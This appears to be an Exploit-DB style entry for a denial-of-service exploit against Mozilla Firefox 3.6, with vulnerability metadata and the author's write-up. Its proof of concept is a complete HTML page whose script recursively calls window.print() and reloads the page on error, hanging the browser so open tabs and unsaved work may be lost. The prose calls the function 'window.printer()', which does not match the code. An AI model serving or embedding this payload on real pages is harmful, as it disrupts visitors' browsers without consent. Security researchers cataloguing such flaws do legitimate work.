Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

vendor:

Firefox

by:

Asheesh Kumar Mani Tripathi

7,5

CVSS

HIGH

Multitudinous looping Denial of Service

CWE

Product Name: Firefox

Affected Version From: Mozilla Firefox 3.6

Affected Version To: Mozilla Firefox 3.6

Patch Exists: NO

Related CWE: N/A

CPE: Mozilla:Firefox:3.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

The flaw exists when the attacker put window.printer() funtion in multitudinous loop.User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

Mitigation:

User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

Source

Exploit-DB raw data:

                     =======================================================================

                      Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
                     =======================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous  loop.  
The flaw exists when the attacker put window.printer() funtion 
in multitudinous loop.User interaction is required to 
exploit this vulnerability in that the target must visit a malicious 
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no 
longer accessible, your work if any   might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

========================================================================================================================

                                                           asheesh.html
========================================================================================================================

<html>
<title>asheesh kumar mani tripathi</title>

<script>


function 
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>

</html>
                                                           
========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.